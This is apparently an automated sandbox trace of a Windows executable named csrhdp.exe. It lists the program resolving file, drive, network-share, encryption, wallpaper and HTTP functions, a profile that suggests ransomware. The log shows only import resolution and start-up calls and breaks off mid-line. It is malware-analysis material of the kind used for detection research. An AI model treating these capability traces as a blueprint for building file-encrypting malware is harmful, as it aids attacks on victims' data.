# Flog Txt Version 1 # Analyzer Version: 3.1.2 # Analyzer Build Date: Oct 28 2019 11:51:53 # Log Creation Date: 07.11.2019 13:22:03.336 Process: id = "1" image_name = "csrhdp.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\csrhdp.exe" page_root = "0x503bf000" os_pid = "0x9b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x9bc [0023.403] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0023.403] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0023.403] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0023.403] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0023.403] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSizeEx") returned 0x76c359e2 [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointer") returned 0x76c317d1 [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="SetFileAttributesW") returned 0x76c4d4f7 [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleWindow") returned 0x76cd7c7d [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalDriveStringsW") returned 0x76cb436f [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryW") returned 0x76c3492b [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="OpenMutexW") returned 0x76c35151 [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="UnregisterWaitEx") returned 0x76c5b921 [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="QueryDepthSList") returned 0x7716471c [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedPopEntrySList") returned 0x77164770 [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="SetPriorityClass") returned 0x76c4cf28 [0023.404] GetProcAddress (hModule=0x76c20000, lpProcName="GetVolumeInformationW") returned 0x76c4c860 [0023.405] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileW") returned 0x76c5830d [0023.405] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0023.405] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0023.405] GetProcAddress (hModule=0x76c20000, lpProcName="GetWindowsDirectoryW") returned 0x76c343e2 [0023.405] GetProcAddress (hModule=0x76c20000, lpProcName="GetDriveTypeW") returned 0x76c3418b [0023.405] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameW") returned 0x76c34950 [0023.405] GetProcAddress (hModule=0x76c20000, lpProcName="OutputDebugStringW") returned 0x76c5d1d4 [0023.405] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessW") returned 0x76c3103d [0023.405] GetProcAddress (hModule=0x76c20000, lpProcName="MoveFileExW") returned 0x76c49b2d [0023.405] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexW") returned 0x76c3424c [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700 [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatW") returned 0x76c5828e [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyW") returned 0x76c53102 [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyA") returned 0x76c52a9d [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemInfo") returned 0x76c349ca [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="ReleaseSemaphore") returned 0x76c4d3ab [0023.407] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExW") returned 0x76c31ae5 [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="GetThreadTimes") returned 0x76cb53eb [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="UnregisterWait") returned 0x76cbe6ab [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="RegisterWaitForSingleObject") returned 0x76c5cb05 [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadAffinityMask") returned 0x76c505a0 [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessAffinityMask") returned 0x76c3a871 [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="GetNumaHighestNodeNumber") returned 0x76cb20b2 [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteTimerQueueTimer") returned 0x76c4f7d3 [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0023.408] GetProcAddress (hModule=0x76c20000, lpProcName="LocalFree") returned 0x76c32d3c [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="LocalAlloc") returned 0x76c3168c [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="SetEvent") returned 0x76c316c5 [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="ResetEvent") returned 0x76c316dd [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObjectEx") returned 0x76c31151 [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="CreateEventW") returned 0x76c3183e [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="UnhandledExceptionFilter") returned 0x76c5772f [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="SetUnhandledExceptionFilter") returned 0x76c387c9 [0023.409] GetProcAddress (hModule=0x76c20000, lpProcName="GetStartupInfoW") returned 0x76c34d40 [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimeAsFileTime") returned 0x76c33509 [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeSListHead") returned 0x771694a4 [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateProcess") returned 0x76c4d802 [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="GetStringTypeW") returned 0x76c31946 [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="DuplicateHandle") returned 0x76c31886 [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThread") returned 0x76c317ec [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="GetExitCodeThread") returned 0x76c4d5b5 [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="TryEnterCriticalSection") returned 0x77162500 [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="EncodePointer") returned 0x77170fcb [0023.410] GetProcAddress (hModule=0x76c20000, lpProcName="DecodePointer") returned 0x77169d35 [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="SetLastError") returned 0x76c311a9 [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76c31916 [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="TlsAlloc") returned 0x76c349ad [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="TlsGetValue") returned 0x76c311e0 [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="TlsSetValue") returned 0x76c314fb [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="TlsFree") returned 0x76c33587 [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="CompareStringW") returned 0x76c33bca [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringW") returned 0x76c317b9 [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="GetLocaleInfoW") returned 0x76c33c42 [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="GetCPInfo") returned 0x76c35189 [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="RaiseException") returned 0x76c358a6 [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="RtlUnwind") returned 0x76c5d1c3 [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibrary") returned 0x76c334c8 [0023.411] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryExW") returned 0x76c3495d [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedPushEntrySList") returned 0x77164757 [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="InterlockedFlushSList") returned 0x77162775 [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleExW") returned 0x76c34a6f [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="GetStdHandle") returned 0x76c351b3 [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineA") returned 0x76c351a1 [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="GetCommandLineW") returned 0x76c35223 [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="GetACP") returned 0x76c3179c [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThread") returned 0x76c334d5 [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibraryAndExitThread") returned 0x76c4d582 [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileType") returned 0x76c33531 [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidLocale") returned 0x76c4ce46 [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultLCID") returned 0x76c33da5 [0023.412] GetProcAddress (hModule=0x76c20000, lpProcName="EnumSystemLocalesW") returned 0x76cb425f [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileExA") returned 0x76cb427f [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileA") returned 0x76c5d53e [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="IsValidCodePage") returned 0x76c34493 [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="GetOEMCP") returned 0x76c5d1a1 [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="GetEnvironmentStringsW") returned 0x76c351e3 [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="FreeEnvironmentStringsW") returned 0x76c351cb [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="SetEnvironmentVariableA") returned 0x76c3e331 [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="SetStdHandle") returned 0x76cb454f [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSize") returned 0x77163002 [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="FlushFileBuffers") returned 0x76c3469b [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleCP") returned 0x76cd7bff [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="GetConsoleMode") returned 0x76c31328 [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="WriteConsoleW") returned 0x76c57aca [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="CreateTimerQueue") returned 0x76c5b020 [0023.413] GetProcAddress (hModule=0x76c20000, lpProcName="SignalObjectAndWait") returned 0x76c4f8a4 [0023.414] GetProcAddress (hModule=0x76c20000, lpProcName="SwitchToThread") returned 0x76c4efec [0023.414] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadPriority") returned 0x76c332bb [0023.414] GetProcAddress (hModule=0x76c20000, lpProcName="GetThreadPriority") returned 0x76c343bf [0023.414] GetProcAddress (hModule=0x76c20000, lpProcName="GetLogicalProcessorInformation") returned 0x76cb4761 [0023.414] GetProcAddress (hModule=0x76c20000, lpProcName="CreateTimerQueueTimer") returned 0x76c4f7eb [0023.414] GetProcAddress (hModule=0x76c20000, lpProcName="ChangeTimerQueueTimer") returned 0x76cb40eb [0023.414] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0023.414] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyKey") returned 0x74d4c51a [0023.414] GetProcAddress (hModule=0x74d40000, lpProcName="GetUserNameW") returned 0x74d5157a [0023.414] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0023.414] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyW") returned 0x74d52459 [0023.414] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExW") returned 0x74d5468d [0023.414] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExW") returned 0x74d546ad [0023.414] GetProcAddress (hModule=0x74d40000, lpProcName="RegSetValueExW") returned 0x74d514d6 [0023.415] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0023.415] GetProcAddress (hModule=0x74d40000, lpProcName="CryptExportKey") returned 0x74d491ea [0023.415] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGenRandom") returned 0x74d4dfc8 [0023.415] GetProcAddress (hModule=0x74d40000, lpProcName="SystemFunction036") returned 0x74d41919 [0023.415] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGenKey") returned 0x74d48ee9 [0023.415] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0023.415] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextW") returned 0x74d4df14 [0023.415] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0023.415] GetProcAddress (hModule=0x759b0000, lpProcName="CryptEncodeObject") returned 0x759c4ba9 [0023.415] GetProcAddress (hModule=0x759b0000, lpProcName="CryptDecodeObjectEx") returned 0x759bd718 [0023.415] GetProcAddress (hModule=0x759b0000, lpProcName="CryptExportPublicKeyInfo") returned 0x759e455f [0023.415] GetProcAddress (hModule=0x759b0000, lpProcName="CryptImportPublicKeyInfo") returned 0x759c6c0e [0023.415] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryW") returned 0x759e5f65 [0023.415] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringW") returned 0x759ea546 [0023.415] GetProcAddress (hModule=0x759b0000, lpProcName="CryptEncodeObjectEx") returned 0x759c4afa [0023.415] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x75ad0000 [0023.416] GetProcAddress (hModule=0x75ad0000, lpProcName="SetBkMode") returned 0x75ae51a2 [0023.416] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateDIBSection") returned 0x75aeac46 [0023.416] GetProcAddress (hModule=0x75ad0000, lpProcName="SetTextColor") returned 0x75ae522d [0023.416] GetProcAddress (hModule=0x75ad0000, lpProcName="SelectObject") returned 0x75ae4f70 [0023.416] GetProcAddress (hModule=0x75ad0000, lpProcName="GetTextExtentPoint32W") returned 0x75aec107 [0023.416] GetProcAddress (hModule=0x75ad0000, lpProcName="DeleteObject") returned 0x75ae5689 [0023.416] GetProcAddress (hModule=0x75ad0000, lpProcName="DeleteDC") returned 0x75ae58b3 [0023.416] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateFontW") returned 0x75aeb600 [0023.416] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateCompatibleDC") returned 0x75ae54f4 [0023.416] GetProcAddress (hModule=0x75ad0000, lpProcName="CreateCompatibleBitmap") returned 0x75ae5f49 [0023.416] GetProcAddress (hModule=0x75ad0000, lpProcName="BitBlt") returned 0x75ae5ea6 [0023.416] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74b50000 [0023.416] GetProcAddress (hModule=0x74b50000, lpProcName="WNetOpenEnumW") returned 0x74b52f06 [0023.416] GetProcAddress (hModule=0x74b50000, lpProcName="WNetEnumResourceW") returned 0x74b53058 [0023.417] GetProcAddress (hModule=0x74b50000, lpProcName="WNetCloseEnum") returned 0x74b52dd6 [0023.417] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0023.417] GetProcAddress (hModule=0x74f40000, lpProcName="ShowWindow") returned 0x74f60dfb [0023.417] GetProcAddress (hModule=0x74f40000, lpProcName="DrawTextW") returned 0x74f625cf [0023.417] GetProcAddress (hModule=0x74f40000, lpProcName="GetDC") returned 0x74f572c4 [0023.417] GetProcAddress (hModule=0x74f40000, lpProcName="ReleaseDC") returned 0x74f57446 [0023.417] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0023.417] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0023.417] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x753d0000 [0023.417] GetProcAddress (hModule=0x753d0000, lpProcName="HttpSendRequestW") returned 0x753fba12 [0023.417] GetProcAddress (hModule=0x753d0000, lpProcName="HttpOpenRequestW") returned 0x753f4a42 [0023.417] GetProcAddress (hModule=0x753d0000, lpProcName="InternetReadFile") returned 0x753eb406 [0023.417] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenW") returned 0x753f9197 [0023.417] GetProcAddress (hModule=0x753d0000, lpProcName="InternetCloseHandle") returned 0x753eab49 [0023.417] GetProcAddress (hModule=0x753d0000, lpProcName="InternetConnectW") returned 0x753f492c [0023.418] GetProcAddress (hModule=0x753d0000, lpProcName="HttpQueryInfoW") returned 0x753f5c75 [0023.418] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0023.430] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0023.430] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x64ccdb90, dwHighDateTime=0x1d5956e)) [0023.430] GetCurrentThreadId () returned 0x9bc [0023.430] GetCurrentProcessId () returned 0x9b8 [0023.430] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=14371527179) returned 1 [0023.430] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0023.430] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.430] GetLastError () returned 0x57 [0023.430] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x74b40000 [0023.434] GetProcAddress (hModule=0x74b40000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0023.434] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.434] GetLastError () returned 0x57 [0023.434] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0023.436] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.436] GetLastError () returned 0x57 [0023.436] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000 [0023.436] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0023.436] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0023.436] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.436] GetLastError () returned 0x57 [0023.436] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x0) returned 0x74d40000 [0023.437] GetProcAddress (hModule=0x74d40000, lpProcName="EventRegister") returned 0x7716f6ba [0023.437] EtwEventRegister () returned 0x0 [0023.437] GetProcAddress (hModule=0x74d40000, lpProcName="EventSetInformation") returned 0x0 [0023.437] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.437] GetLastError () returned 0x57 [0023.437] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x74b40000 [0023.437] GetProcAddress (hModule=0x74b40000, lpProcName="InitializeCriticalSectionEx") returned 0x0 [0023.437] GetProcessHeap () returned 0x2e0000 [0023.438] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.438] GetLastError () returned 0x57 [0023.438] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0023.438] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0023.438] GetLastError () returned 0x57 [0023.438] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000 [0023.438] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b [0023.438] GetLastError () returned 0x57 [0023.438] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252 [0023.438] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x364) returned 0x2fdaf8 [0023.438] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208 [0023.438] SetLastError (dwErrCode=0x57) [0023.438] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xc00) returned 0x2fde68 [0023.440] GetStartupInfoW (in: lpStartupInfo=0x18fea0 | out: lpStartupInfo=0x18fea0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4115a0, hStdOutput=0x3dd8e51a, hStdError=0xfffffffe)) [0023.440] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0023.440] GetFileType (hFile=0x3) returned 0x2 [0023.441] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0023.441] GetFileType (hFile=0x7) returned 0x2 [0023.441] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0023.441] GetFileType (hFile=0xb) returned 0x2 [0023.442] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe\" " [0023.442] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe\" " [0023.442] GetLastError () returned 0x57 [0023.442] SetLastError (dwErrCode=0x57) [0023.442] GetLastError () returned 0x57 [0023.442] SetLastError (dwErrCode=0x57) [0023.442] GetACP () returned 0x4e4 [0023.442] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x220) returned 0x2ff270 [0023.442] IsValidCodePage (CodePage=0x4e4) returned 1 [0023.442] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fed0 | out: lpCPInfo=0x18fed0) returned 1 [0023.442] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f798 | out: lpCPInfo=0x18f798) returned 1 [0023.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0023.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdac, cbMultiByte=256, lpWideCharStr=0x18f538, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ") returned 256 [0023.442] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ", cchSrc=256, lpCharType=0x18f7ac | out: lpCharType=0x18f7ac) returned 1 [0023.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdac, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0023.442] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fdac, cbMultiByte=256, lpWideCharStr=0x18f4e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 